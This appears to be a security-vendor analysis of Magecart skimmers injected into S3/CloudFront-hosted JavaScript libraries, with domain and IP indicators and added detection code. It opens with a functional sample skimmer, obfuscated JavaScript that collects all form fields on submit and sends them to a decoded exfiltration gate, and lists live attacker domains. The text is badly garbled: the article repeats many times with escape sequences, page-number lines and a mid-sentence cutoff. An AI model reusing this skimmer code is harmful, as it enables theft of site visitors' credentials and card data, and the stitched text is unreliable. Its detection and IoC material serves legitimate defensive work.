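const SAMPLE_SKIMMER = `(function(){var h=atob("${ENCODED_GATE}");var g=h.replace(/../g,function(b){return String.fromCharCode(parseInt(b,16))});document.addEventListener("submit",function(){var f=document.forms[0],d="";for(var i=0;i<f.elements.length;i++){d+=f.elements[i].name+"="+f.elements[i].value+"&";}(new Image).src=g+"?d="+btoa(d);});})();`;

console.log(reportGates(SAMPLE_SKIMMER).join('\n'));
```

Hex is tested before Base64 because any hex string is also syntactically valid Base64 and would otherwise decode to garbage; a step only counts when it produces printable text. The scanner looks only at plain string literals, so a skimmer that splits its strings or assembles them with String.fromCharCode needs the pieces joined first.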
The stolen form data is also encoded before being sent back to the criminal infrastructure.

While we would have expected to see many Magento e-commerce shops, some of the victims included a news portal, a lawyer’s office, a software company, and a small telecom operator, all running a variety of Content Management Systems (CMSes).

As such, many did not even have a payment form within their site. Most simply had a sign-up or login form instead. This makes us believe that Magecart threat actors may be conducting “spray and pray” attacks on the CDNs they are able to access. Perhaps they are hoping to compromise libraries for sites with high traffic or tied to valuable infrastructure from which they can steal input data.

Connection with existing campaign

The skimmer used in this attack looked eerily familiar. Indeed, by going back in time, we noted it used to have the same exfiltration gate (font-assets[.]com) identified by Yonathan Klijnsma in RiskIQ’s report on several recent supply-chain attacks.

RiskIQ, in partnership with Abuse.ch and the Shadowserver Foundation, sinkholed both that domain and another (ww1-filecloud[.]com) in an effort to disrupt the criminals’ infrastructure.

A cursory look at this new cdn-imgcloud[.]com gate shows that it was registered just a couple of days after the RiskIQ blog post came out and uses Carbon2u (which has a certain history) as nameservers.

Creation Date: 2019-05-16T07:12:30Z
Registrar: Shinjiru Technology Sdn Bhd
Name Server: NS1.CARBON2U.COM
Name Server: NS2.CARBON2U.COM

The domain resolves to the IP address 45.114.8[.]160, which belongs to ASN 55933 in Hong Kong.
By exploring the same subnet, we can find other exfiltration gates also registered recently.

What the VirusTotal graph also shows is that the two domains (font-assets[.]com and ww1-filecloud[.]com) that were previously sinkholed to 179.43.144[.]137 (a server in Switzerland) came back into the hands of the criminals.

Historical passive DNS records show that on 05-25-2019, font-assets[.]com started resolving to 45.114.8[.]161. The same thing happened for ww1-filecloud[.]com, which ended up resolving to 45.114.8[.]159 after a few swaps.

Finding and exploiting weaknesses

This type of attack on private CDN repositories is not new, but it reminds us that threat actors will look to exploit anything that is vulnerable to gain entry into systems. Sometimes, coming in through the front door is not a viable option, so they look for other ways.

While this example is not a third-party script supply-chain attack, the tampered libraries are still served from third-party infrastructure. Beyond applying the same level of access control to your own CDN-hosted repositories (S3 buckets, CloudFront origins) as to the website itself, other measures, such as validating any externally loaded content with Subresource Integrity checks, can save the day.

We reached out to the victims we identified in this campaign and several have already remediated the breach. In other cases, we filed an abuse report directly with Amazon.
Malwarebytes users are protected against the skimmers mentioned in this blog and the new ones we discover each day.

Indicators of Compromise (IoCs)

ww1-filecloud[.]com,45.114.8[.]159
cdn-imgcloud[.]com,45.114.8[.]160
font-assets[.]com,45.114.8[.]161
wix-cloud[.]com,45.114.8[.]162
js-cloudhost[.]com,45.114.8[.]163

Update (06-08-2019): The compromises of Amazon S3 buckets continue and some large sites are being affected. Our crawler spotted a malicious injection that loads a skimmer for the Washington Wizards page on the official NBA.com website.

The skimmer was inserted in this JavaScript library:

hxxps://s3[.]amazonaws[.]com/wsaimages/js/wizards[.]js

Interestingly, this same library had already been altered, to load content from another external domain, some time earlier in January of this year. We have reported this incident to Amazon. A complete archived scan of the page can be found here.
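Turning the IoC list above into a detection, as an added example (not code from the post): refang the defanged entries, then flag log lines that reach the gates, any subdomain of them, or any other host on the same /24, which the post notes holds further recently registered gates. The proxy log lines are constructed for the demonstration.

```javascript
// Added example (not the post's code): run the post's IoC list over proxy log
// lines. The log lines are constructed; the IoC list is the one from the post.
const IOC_CSV = `ww1-filecloud[.]com,45.114.8[.]159
cdn-imgcloud[.]com,45.114.8[.]160
font-assets[.]com,45.114.8[.]161
wix-cloud[.]com,45.114.8[.]162
js-cloudhost[.]com,45.114.8[.]163`;

// Undo the usual defanging: "[.]" for "." and "hxxp" for "http".
function refang(s) {
  return s.replace(/\[\.\]/g, '.').replace(/^hxxp/i, 'http');
}

// Build lookup sets: exact domains, exact IPs, and the /24 of each IP.
function parseIocs(csv) {
  const domains = new Set(), ips = new Set(), subnets = new Set();
  for (const line of csv.trim().split('\n')) {
    const [d, ip] = line.split(',').map(s => refang(s.trim()));
    domains.add(d.toLowerCase());
    ips.add(ip);
    subnets.add(ip.split('.').slice(0, 3).join('.'));
  }
  return { domains, ips, subnets };
}

// Minimal tokeniser: hostnames and IPv4 literals anywhere in a log line.
function hostsIn(line) {
  return line.toLowerCase().match(/[a-z0-9-]+(\.[a-z0-9-]+)+/g) || [];
}

// Verdict for one token: IoC IP, IoC domain (or a subdomain of one), a neighbour
// on the same /24 (triage lead only), or null.
function classify(token, iocs) {
  if (/^\d{1,3}(\.\d{1,3}){3}$/.test(token)) {
    if (iocs.ips.has(token)) return 'ioc-ip';
    if (iocs.subnets.has(token.split('.').slice(0, 3).join('.'))) return 'same-subnet';
    return null;
  }
  const parts = token.split('.');
  for (let i = 0; i < parts.length - 1; i++) {
    if (iocs.domains.has(parts.slice(i).join('.'))) return 'ioc-domain';
  }
  return null;
}

function scanLogs(lines, iocs) {
  const alerts = [];
  for (const line of lines) {
    for (const token of hostsIn(line)) {
      const verdict = classify(token, iocs);
      if (verdict) alerts.push({ line, indicator: token, verdict });
    }
  }
  return alerts;
}

// Constructed proxy-style log lines; the CloudFront hostname is hypothetical.
const SAMPLE_LOGS = [
  '2019-06-03T10:12:01Z 10.0.0.5 GET https://cdn-imgcloud.com/img?d=dXNlcj1hbGljZQ== 200',
  '2019-06-03T10:12:02Z 10.0.0.5 GET https://d111111abcdef8.cloudfront.net/js/site.js 200',
  '2019-06-03T10:13:45Z 10.0.0.9 CONNECT 45.114.8.164:443',
  '2019-06-03T10:14:10Z 10.0.0.7 GET https://www.example.com/ 200',
];

const IOCS = parseIocs(IOC_CSV);
for (const a of scanLogs(SAMPLE_LOGS, IOCS)) {
  console.log(`${a.verdict.padEnd(12)} ${a.indicator.padEnd(20)} ${a.line}`);
}
```

A same-subnet hit is a triage lead rather than a verdict; confirm it against passive DNS before blocking. The passive DNS timeline above also shows that a sinkholed domain is not permanently safe: font-assets[.]com and ww1-filecloud[.]com returned to the criminals’ infrastructure within weeks, so a rule keyed only on the sinkhole address 179.43.144[.]137 would have gone stale.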
Update (06-08-2019): The compromises of Amazon S3 buckets continue and some large sites are being affected. Our crawler spotted a malicious injection that loads a skimmer for the Washington Wizards page on the official NBA.com website.
The skimmer was inserted in this JavaScript library:
hxxps://s3[.]amazonaws[.]com/wsaimages/js/wizards[.]js
Interestingly, this same library had already been altered (loading content from an external .com domain) some time earlier, in January of this year. We have reported this incident to Amazon.
A complete archived scan of the page can be found here.
—
Late last week, we observed a number of compromises on Amazon CloudFront, a Content Delivery Network (CDN), where hosted JavaScript libraries were tampered with and injected with web skimmers.
Although attacks that involve CDNs usually affect a large number of web properties at once via their supply chain, this isn't always the case. Some websites use Amazon's cloud infrastructure to host their own libraries, or link to code developed specifically for them and hosted in a custom AWS S3 bucket.
Without properly validating content loaded externally, these sites expose their users to various threats, including some that pilfer credit card data. After analyzing these breaches, we found that they are a continuation of a campaign by Magecart threat actors attempting to cast a wide net around many different CDNs.
The ideal place to conceal a skimmer
CDNs are widely used because they provide great benefits to website owners, including optimizing load times and cost, as well as helping with all sorts of data analytics.
The sites we identified during a crawl had nothing in common other than the fact that they were all using their own custom CDN to load various libraries. In effect, the only victims of a compromise of such a CDN repository would be that one site and its visitors.
This first example shows a JavaScript library that is hosted in its own dedicated AWS S3 bucket.
The skimmer can be seen appended to the original code, using obfuscation to conceal itself.
This second case shows the skimmer injected not just into one library but into several contained within the same directory, once again part of an S3 bucket that is used only by this one website.
Finally, here is another example where the skimmer was injected into various scripts loaded from a custom CloudFront URL.
Exfiltration gate
This skimmer uses two levels of encoding (hex followed by Base64) to hide some of its payload, including the exfiltration gate (cdn-imgcloud[.]com). The stolen form data is also encoded before being sent to the criminal infrastructure.
While we would have expected to see many Magento e-commerce shops, some of the victims included a news portal, a lawyer's office, a software company, and a small telecom operator, all running a variety of Content Management Systems (CMSes).
As such, many did not even have a payment form on their site; most simply had a sign-up or login form instead. This makes us believe that Magecart threat actors may be conducting "spray and pray" attacks on whatever CDNs they are able to access, perhaps hoping to compromise libraries for sites with high traffic or tied to valuable infrastructure from which they can steal input data.
Connection with existing campaign
The skimmer used in this attack looked eerily familiar.
Indeed, by going back in time, we noted that it used to have the same exfiltration gate (font-assets[.]com) identified by Yonathan Klijnsma in RiskIQ's report on several recent supply-chain attacks.
RiskIQ, in partnership with Abuse.ch and the Shadowserver Foundation, sinkholed both that domain and another (ww1-filecloud[.]com) in an effort to disrupt the criminals' infrastructure.
A cursory look at this new cdn-imgcloud[.]com gate shows that it was registered just a couple of days after the RiskIQ blog post came out and uses Carbon2u (which has a certain history) as nameservers.
Creation Date: 2019-05-16T07:12:30Z
Registrar: Shinjiru Technology Sdn Bhd
Name Server: NS1.CARBON2U.COM
Name Server: NS2.CARBON2U.COM
The domain resolves to the IP address 45.114.8[.]160, which belongs to ASN 55933 in Hong Kong. By exploring the same subnet, we can find other exfiltration gates that were also registered recently.
What we can also see from the above VirusTotal graph is that the two domains (font-assets[.]com and ww1-filecloud[.]com) that were previously sinkholed to 179.43.144[.]137 (a server in Switzerland) came back into the hands of the criminals.
Historical passive DNS records show that on 05-25-2019, font-assets[.]com started resolving to 45.114.8[.]161. The same thing happened to ww1-filecloud[.]com, which ended up resolving to 45.114.8[.]159 after a few swaps.
Finding and exploiting weaknesses
This type of attack on private CDN repositories is not new, but it reminds us that threat actors will look to exploit anything that is vulnerable to gain entry into systems.
Sometimes, coming in through the front door is not a viable option, so they will look for other ways.
While this example is not a third-party script supply-chain attack, the code is served from third-party infrastructure. Beyond applying the same level of access control to your own CDN-hosted repositories as to your actual website, other measures, such as validating any externally loaded content (via Subresource Integrity checks, for example), can save the day.
We reached out to the victims we identified in this campaign, and several have already remediated the breach. In other cases, we filed an abuse report directly with Amazon. Malwarebytes users are protected against the skimmers mentioned in this blog and the new ones we discover each day.
Indicators of Compromise (IoCs)
ww1-filecloud[.]com,45.114.8[.]159
cdn-imgcloud[.]com,45.114.8[.]160
font-assets[.]com,45.114.8[.]161
wix-cloud[.]com,45.114.8[.]162
js-cloudhost[.]com,45.114.8[.]163
A complete archived scan of the\r\npage can be found here.\r\n—\r\nLate last week, we observed a number of compromises on Amazon CloudFront – a Content Delivery Network\r\n(CDN) – where hosted JavaScript libraries were tampered with and injected with web skimmers.\r\nAlthough attacks that involve CDNs usually affect a large number of web properties at once via their supply chain,\r\nthis isn’t always the case. Some websites either use Amazon’s cloud infrastructure to host their own libraries or\r\nlink to code developed specifically for them and hosted on a custom AWS S3 bucket.\r\nWithout properly validating content loaded externally, these sites are exposing their users to various threats,\r\nincluding some that pilfer credit card data. After analyzing these breaches, we found that they are a continuation of\r\na campaign from Magecart threat actors attempting to cast a wide net around many different CDNs.\r\nThe ideal place to conceal a skimmer\r\nCDNs are widely used because they provide great benefits to website owners, including optimizing load times and\r\ncost, as well as helping with all sorts of data analytics.\r\nThe sites we identified during a crawl had nothing in common other than the fact they were all using their own\r\ncustom CDN to load various libraries. In effect, the only resulting victims of a compromise on their CDN\r\nrepository would be themselves.\r\nThis first example shows a JavaScript library that is hosted on its own dedicated AWS S3 bucket. 
The skimmer can be seen appended to the original code, using obfuscation to conceal itself.\r\n
This second case shows the skimmer injected not just in one library but in several contained within the same directory, once again part of an S3 bucket that is used only by this one website.\r\n
Finally, here’s another example where the skimmer was injected into various scripts loaded from a custom CloudFront URL.\r\n
Exfiltration gate\r\n
This skimmer uses two levels of encoding (hex followed by Base64) to hide some of its payload, including the exfiltration gate (cdn-imgcloud[.]com). The stolen form data is also encoded before being sent back to the criminal infrastructure.\r\n
While we would have expected to see many Magento e-commerce shops, some of the victims included a news portal, a lawyer’s office, a software company, and a small telecom operator, all running a variety of Content Management Systems (CMSes).\r\n
Accordingly, many did not even have a payment form on their site. Most simply had a sign-up or login form instead. This makes us believe that Magecart threat actors may be conducting “spray and pray” attacks on the CDNs they are able to access. Perhaps they are hoping to compromise libraries for sites with high traffic or tied to valuable infrastructure from which they can steal input data.\r\n
Connection with existing campaign\r\n
The skimmer used in this attack looked eerily familiar. Indeed, by going back in time, we noted that it used to have the same exfiltration gate (font-assets[.]com) identified by Yonathan Klijnsma in RiskIQ’s report on several recent supply-chain attacks.\r\n
RiskIQ, in partnership with Abuse.ch and the Shadowserver Foundation, sinkholed both that domain and another (ww1-filecloud[.]com) in an effort to disrupt the criminals’ infrastructure.\r\n
A cursory look at this new cdn-imgcloud[.]com gate shows that it was registered just a couple of days after the RiskIQ blog post came out and uses Carbon2u (which has a certain history) as nameservers.\r\n
Creation Date: 2019-05-16T07:12:30Z\r\nRegistrar: Shinjiru Technology Sdn Bhd\r\nName Server: NS1.CARBON2U.COM\r\nName Server: NS2.CARBON2U.COM\r\n
The domain resolves to the IP address 45.114.8[.]160, which belongs to ASN 55933 in Hong Kong. 
By exploring the same subnet, we can find other exfiltration gates that were also registered recently.\r\n
What we can also see from the VirusTotal graph above is that the two domains (font-assets[.]com and ww1-filecloud[.]com) that were previously sinkholed to 179.43.144[.]137 (a server in Switzerland) came back into the hands of the criminals.\r\n
Historical passive DNS records show that on May 25, 2019, font-assets[.]com started resolving to 45.114.8[.]161. The same thing happened to ww1-filecloud[.]com, which ended up resolving to 45.114.8[.]159 after a few swaps.\r\n
Finding and exploiting weaknesses\r\n
This type of attack on private CDN repositories is not new, but it reminds us that threat actors will look to exploit anything that is vulnerable to gain entry into systems. Sometimes, coming in through the front door is not a viable option, so they will look for other ways.\r\n
While this example is not a third-party script supply-chain attack, the tampered code is served from third-party infrastructure. Beyond applying the same level of access control to your own CDN-hosted repositories as to your actual website, other measures, such as validation of any externally loaded content (via Subresource Integrity checks, for example), can save the day.\r\n
We reached out to the victims we identified in this campaign and several have already remediated the breach. In other cases, we filed an abuse report directly with Amazon. 
Malwarebytes users are protected against the skimmers mentioned in this blog and the new ones we discover each day.\r\n
Indicators of Compromise (IoCs)\r\n
Domain,IP address\r\nww1-filecloud[.]com,45.114.8[.]159\r\ncdn-imgcloud[.]com,45.114.8[.]160\r\nfont-assets[.]com,45.114.8[.]161\r\nwix-cloud[.]com,45.114.8[.]162\r\njs-cloudhost[.]com,45.114.8[.]163\r\n
Update (June 8, 2019): The compromises of Amazon S3 buckets continue, and some large sites are being affected. Our crawler spotted a malicious injection that loads a skimmer on the Washington Wizards page of the official NBA.com website.\r\n
The skimmer was inserted in this JavaScript library:\r\nhxxps://s3[.]amazonaws[.]com/wsaimages/js/wizards[.]js\r\n
Interestingly, this same library had already been altered (loading content from com) some time earlier, in January of this year. We have reported this incident to Amazon. 
A complete archived scan of the\r\npage can be found here.\r\n—\r\nLate last week, we observed a number of compromises on Amazon CloudFront – a Content Delivery Network\r\n(CDN) – where hosted JavaScript libraries were tampered with and injected with web skimmers.\r\nAlthough attacks that involve CDNs usually affect a large number of web properties at once via their supply chain,\r\nthis isn’t always the case. Some websites either use Amazon’s cloud infrastructure to host their own libraries or\r\nlink to code developed specifically for them and hosted on a custom AWS S3 bucket.\r\nWithout properly validating content loaded externally, these sites are exposing their users to various threats,\r\nincluding some that pilfer credit card data. After analyzing these breaches, we found that they are a continuation of\r\na campaign from Magecart threat actors attempting to cast a wide net around many different CDNs.\r\nThe ideal place to conceal a skimmer\r\nCDNs are widely used because they provide great benefits to website owners, including optimizing load times and\r\ncost, as well as helping with all sorts of data analytics.\r\nThe sites we identified during a crawl had nothing in common other than the fact they were all using their own\r\ncustom CDN to load various libraries. In effect, the only resulting victims of a compromise on their CDN\r\nrepository would be themselves.\r\nThis first example shows a JavaScript library that is hosted on its own dedicated AWS S3 bucket. 
The skimmer\r\ncan be seen appended to the original code and using obfuscation to conceal itself.\r\nThis second case shows the skimmer injected not just in one library, but several contained within the same\r\ndirectory, once again part of an S3 bucket that is only used by this one website.\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 224 of 351\n\nFinally, here’s another example where the skimmer was injected in various scripts loaded from a custom\r\nCloudFront URL.\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 225 of 351\n\nExfiltration gate\r\nThis skimmer uses two levels of encoding (hex followed by Base64) to hide some of its payload, including the\r\nexfiltration gate (cdn-imgcloud[.]com). The stolen form data is also encoded before being sent back to the\r\ncriminal infrastructure.\r\nWhile we would have expected to see many Magento e-commerce shops, some of the victims included a news\r\nportal, a lawyer’s office, a software company, and a small telecom operator, all running a variety of Content\r\nManagement Systems (CMSes).\r\nAs such, many did not even have a payment form within their site. Most simply had a sign up or login form\r\ninstead. This makes us believe that Magecart threat actors may be conducting “spray and pray” attacks on the\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 226 of 351\n\nCDNs they are able to access. Perhaps they are hoping to compromise libraries for sites with high traffic or tied to\r\nvaluable infrastructure from which they can steal input data.\r\nConnection with existing campaign\r\nThe skimmer used in this attack looked eerily familiar. 
Indeed, by going back in time, we noted it used to have the\r\nsame exfiltration gate (font-assets[.]com) identified by Yonathan Klijnsma in RiskIQ’s report on several recent\r\nsupply-chain attacks.\r\nRiskIQ, in partnership with Abuse.ch and the Shadowserver Foundation, sinkholed both that domain and another\r\n(ww1-filecloud[.]com) in an effort to disrupt the criminal’s infrastructure.\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 227 of 351\n\nA cursory look at this new cdn-imgcloud[.]com gate shows that it was registered just a couple days after the\r\nRiskIQ blog post came out and uses Carbon2u (which has a certain history) as nameservers.\r\nCreation Date: 2019-05-16T07:12:30Z\r\nRegistrar: Shinjiru Technology Sdn Bhd\r\nName Server: NS1.CARBON2U.COM\r\nName Server: NS2.CARBON2U.COM\r\nThe domain resolves to the IP address 45.114.8[.]160 that belongs to ASN 55933 in Hong Kong. By exploring the\r\nsame subnet, we can find other exfiltration gates also registered recently.\r\nWhat we can also see from the above VirusTotal graph, is that the two domains (font-assets[.]com and ww1-\r\nfilecloud[.]com) that were previously sinkholed to 179.43.144[.]137 (server in Switzerland) came back into the\r\nhands of the criminals.\r\nHistorical passive DNS records show that on 05-25-2019, font-assets[.]com started resolving to 45.114.8[.]161.\r\nThe same thing happened for ww1-filecloud[.]com, which ended up resolving to 45.114.8[.]159 after a few swaps.\r\nFinding and exploiting weaknesses\r\nThis type of attack on private CDN repositories is not new, but reminds us that threat actors will look to exploit\r\nanything that is vulnerable to gain entry into systems. 
Sometimes, coming in from the front door might not be a\r\nviable option, so they will look for other ways.\r\nWhile this example is not a third-party script supply-chain attack, it is served from third-party infrastructure.\r\nBeyond applying the same level of access control to your own CDN-hosted repositories as your actual website,\r\nother measures—such as validation of any externally loaded content (via Subresource Integrity checks, for\r\nexample)—can save the day.\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 228 of 351\n\nWe reached out to the victims we identified in this campaign and several have already remediated the breach. In\r\nother cases, we filed an abuse report directly with Amazon. Malwarebytes users are protected against the\r\nskimmers mentioned in this blog and the new ones we discover each day.\r\nIndicators of Compromise (IoCs)\r\nww1-filecloud[.]com,45.114.8[.]159\r\ncdn-imgcloud[.]com,45.114.8[.]160\r\nfont-assets[.]com,45.114.8[.]161\r\nwix-cloud[.]com,45.114.8[.]162\r\njs-cloudhost[.]com,45.114.8[.]163\r\nFinally, here’s another example where the skimmer was injected in various scripts loaded from a custom\r\nCloudFront URL.\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 229 of 351\n\nExfiltration gate\r\nThis skimmer uses two levels of encoding (hex followed by Base64) to hide some of its payload, including the\r\nexfiltration gate (cdn-imgcloud[.]com). The stolen form data is also encoded before being sent back to the\r\ncriminal infrastructure.\r\nWhile we would have expected to see many Magento e-commerce shops, some of the victims included a news\r\nportal, a lawyer’s office, a software company, and a small telecom operator, all running a variety of Content\r\nManagement Systems (CMSes).\r\nAs such, many did not even have a payment form within their site. 
Most simply had a sign up or login form\r\ninstead. This makes us believe that Magecart threat actors may be conducting “spray and pray” attacks on the\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 230 of 351\n\nCDNs they are able to access. Perhaps they are hoping to compromise libraries for sites with high traffic or tied to\r\nvaluable infrastructure from which they can steal input data.\r\nConnection with existing campaign\r\nThe skimmer used in this attack looked eerily familiar. Indeed, by going back in time, we noted it used to have the\r\nsame exfiltration gate (font-assets[.]com) identified by Yonathan Klijnsma in RiskIQ’s report on several recent\r\nsupply-chain attacks.\r\nRiskIQ, in partnership with Abuse.ch and the Shadowserver Foundation, sinkholed both that domain and another\r\n(ww1-filecloud[.]com) in an effort to disrupt the criminal’s infrastructure.\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 231 of 351\n\nA cursory look at this new cdn-imgcloud[.]com gate shows that it was registered just a couple days after the\r\nRiskIQ blog post came out and uses Carbon2u (which has a certain history) as nameservers.\r\nCreation Date: 2019-05-16T07:12:30Z\r\nRegistrar: Shinjiru Technology Sdn Bhd\r\nName Server: NS1.CARBON2U.COM\r\nName Server: NS2.CARBON2U.COM\r\nThe domain resolves to the IP address 45.114.8[.]160 that belongs to ASN 55933 in Hong Kong. 
By exploring the\r\nsame subnet, we can find other exfiltration gates also registered recently.\r\nWhat we can also see from the above VirusTotal graph, is that the two domains (font-assets[.]com and ww1-\r\nfilecloud[.]com) that were previously sinkholed to 179.43.144[.]137 (server in Switzerland) came back into the\r\nhands of the criminals.\r\nHistorical passive DNS records show that on 05-25-2019, font-assets[.]com started resolving to 45.114.8[.]161.\r\nThe same thing happened for ww1-filecloud[.]com, which ended up resolving to 45.114.8[.]159 after a few swaps.\r\nFinding and exploiting weaknesses\r\nThis type of attack on private CDN repositories is not new, but reminds us that threat actors will look to exploit\r\nanything that is vulnerable to gain entry into systems. Sometimes, coming in from the front door might not be a\r\nviable option, so they will look for other ways.\r\nWhile this example is not a third-party script supply-chain attack, it is served from third-party infrastructure.\r\nBeyond applying the same level of access control to your own CDN-hosted repositories as your actual website,\r\nother measures—such as validation of any externally loaded content (via Subresource Integrity checks, for\r\nexample)—can save the day.\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 232 of 351\n\nWe reached out to the victims we identified in this campaign and several have already remediated the breach. In\r\nother cases, we filed an abuse report directly with Amazon. 
Malwarebytes users are protected against the\r\nskimmers mentioned in this blog and the new ones we discover each day.\r\nIndicators of Compromise (IoCs)\r\nww1-filecloud[.]com,45.114.8[.]159\r\ncdn-imgcloud[.]com,45.114.8[.]160\r\nfont-assets[.]com,45.114.8[.]161\r\nwix-cloud[.]com,45.114.8[.]162\r\njs-cloudhost[.]com,45.114.8[.]163\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 233 of 351\n\nExfiltration gate\r\nThis skimmer uses two levels of encoding (hex followed by Base64) to hide some of its payload, including the\r\nexfiltration gate (cdn-imgcloud[.]com). The stolen form data is also encoded before being sent back to the\r\ncriminal infrastructure.\r\nWhile we would have expected to see many Magento e-commerce shops, some of the victims included a news\r\nportal, a lawyer’s office, a software company, and a small telecom operator, all running a variety of Content\r\nManagement Systems (CMSes).\r\nAs such, many did not even have a payment form within their site. Most simply had a sign up or login form\r\ninstead. This makes us believe that Magecart threat actors may be conducting “spray and pray” attacks on the\r\nCDNs they are able to access. Perhaps they are hoping to compromise libraries for sites with high traffic or tied to\r\nvaluable infrastructure from which they can steal input data.\r\nConnection with existing campaign\r\nThe skimmer used in this attack looked eerily familiar. 
Indeed, by going back in time, we noted it used to have the\r\nsame exfiltration gate (font-assets[.]com) identified by Yonathan Klijnsma in RiskIQ’s report on several recent\r\nsupply-chain attacks.\r\nRiskIQ, in partnership with Abuse.ch and the Shadowserver Foundation, sinkholed both that domain and another\r\n(ww1-filecloud[.]com) in an effort to disrupt the criminal’s infrastructure.\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 234 of 351\n\nA cursory look at this new cdn-imgcloud[.]com gate shows that it was registered just a couple days after the\r\nRiskIQ blog post came out and uses Carbon2u (which has a certain history) as nameservers.\r\nCreation Date: 2019-05-16T07:12:30Z\r\nRegistrar: Shinjiru Technology Sdn Bhd\r\nName Server: NS1.CARBON2U.COM\r\nName Server: NS2.CARBON2U.COM\r\nThe domain resolves to the IP address 45.114.8[.]160 that belongs to ASN 55933 in Hong Kong. By exploring the\r\nsame subnet, we can find other exfiltration gates also registered recently.\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 235 of 351\n\nWhat we can also see from the above VirusTotal graph, is that the two domains (font-assets[.]com and ww1-\r\nfilecloud[.]com) that were previously sinkholed to 179.43.144[.]137 (server in Switzerland) came back into the\r\nhands of the criminals.\r\nHistorical passive DNS records show that on 05-25-2019, font-assets[.]com started resolving to 45.114.8[.]161.\r\nThe same thing happened for ww1-filecloud[.]com, which ended up resolving to 45.114.8[.]159 after a few swaps.\r\nFinding and exploiting weaknesses\r\nThis type of attack on private CDN repositories is not new, but reminds us that threat actors will look to exploit\r\nanything that is vulnerable to gain entry into systems. 
Update (06-08-2019): The compromises of Amazon S3 buckets continue, and some large sites are being affected. Our crawler spotted a malicious injection that loads a skimmer on the Washington Wizards page of the official NBA.com website.\r\nThe skimmer was inserted in this JavaScript library:\r\nhxxps://s3[.]amazonaws[.]com/wsaimages/js/wizards[.]js\r\nInterestingly, this same library had already been altered some time earlier, in January of this year, to load content from another domain. We have reported this incident to Amazon. A complete archived scan of the page can be found here.\r\n—\r\nLate last week, we observed a number of compromises on Amazon CloudFront, a Content Delivery Network (CDN), where hosted JavaScript libraries were tampered with and injected with web skimmers.\r\nAlthough attacks that involve CDNs usually affect a large number of web properties at once via their supply chain, this isn’t always the case. Some websites either use Amazon’s cloud infrastructure to host their own libraries or link to code developed specifically for them and hosted on a custom AWS S3 bucket.\r\nWithout properly validating content loaded externally, these sites expose their users to various threats, including some that pilfer credit card data. After analyzing these breaches, we found that they are a continuation of a campaign from Magecart threat actors attempting to cast a wide net around many different CDNs.\r\nThe ideal place to conceal a skimmer\r\nCDNs are widely used because they provide great benefits to website owners, including optimizing load times and cost, as well as helping with all sorts of data analytics.\r\nThe sites we identified during a crawl had nothing in common other than the fact that they were all using their own custom CDN to load various libraries. In effect, the only victims of a compromise of their CDN repository would be themselves.\r\nThis first example shows a JavaScript library that is hosted on its own dedicated AWS S3 bucket. The skimmer can be seen appended to the original code, using obfuscation to conceal itself.\r\nThis second case shows the skimmer injected not just in one library but in several contained within the same directory, once again part of an S3 bucket that is used only by this one website.\r\nFinally, here’s another example where the skimmer was injected in various scripts loaded from a custom CloudFront URL.\r\nExfiltration gate\r\nThis skimmer uses two levels of encoding (hex followed by Base64) to hide some of its payload, including the exfiltration gate (cdn-imgcloud[.]com). The stolen form data is also encoded before being sent back to the criminal infrastructure.\r\nWhile we would have expected to see many Magento e-commerce shops, the victims included a news portal, a lawyer’s office, a software company, and a small telecom operator, all running a variety of Content Management Systems (CMSes).\r\nAs such, many did not even have a payment form on their site; most simply had a sign-up or login form instead. This makes us believe that Magecart threat actors may be conducting “spray and pray” attacks on the CDNs they are able to access, perhaps hoping to compromise libraries for sites with high traffic or tied to valuable infrastructure from which they can steal input data.\r\nConnection with existing campaign\r\nThe skimmer used in this attack looked eerily familiar. Indeed, by going back in time, we noted that it used to have the same exfiltration gate (font-assets[.]com) identified by Yonathan Klijnsma in RiskIQ’s report on several recent supply-chain attacks.\r\nRiskIQ, in partnership with Abuse.ch and the Shadowserver Foundation, sinkholed both that domain and another (ww1-filecloud[.]com) in an effort to disrupt the criminals’ infrastructure.\r\nA cursory look at this new cdn-imgcloud[.]com gate shows that it was registered just a couple of days after the RiskIQ blog post came out and uses Carbon2u (which has a certain history) as nameservers.\r\nCreation Date: 2019-05-16T07:12:30Z\r\nRegistrar: Shinjiru Technology Sdn Bhd\r\nName Server: NS1.CARBON2U.COM\r\nName Server: NS2.CARBON2U.COM\r\nThe domain resolves to the IP address 45.114.8[.]160, which belongs to ASN 55933 in Hong Kong. By exploring the same subnet, we can find other exfiltration gates that were also registered recently.\r\nWhat we can also see from the VirusTotal graph is that the two domains (font-assets[.]com and ww1-filecloud[.]com) that were previously sinkholed to 179.43.144[.]137 (a server in Switzerland) came back into the hands of the criminals.\r\nHistorical passive DNS records show that on 05-25-2019, font-assets[.]com started resolving to 45.114.8[.]161. The same thing happened for ww1-filecloud[.]com, which ended up resolving to 45.114.8[.]159 after a few swaps.\r\nFinding and exploiting weaknesses\r\nThis type of attack on private CDN repositories is not new, but it reminds us that threat actors will look to exploit anything that is vulnerable to gain entry into systems. Sometimes, coming in through the front door is not a viable option, so they will look for other ways.\r\nWhile this example is not a third-party script supply-chain attack, the code is still served from third-party infrastructure. Apply the same level of access control to your own CDN-hosted repositories as to your actual website: no public write access to the bucket, object versioning so that a tampered library can be 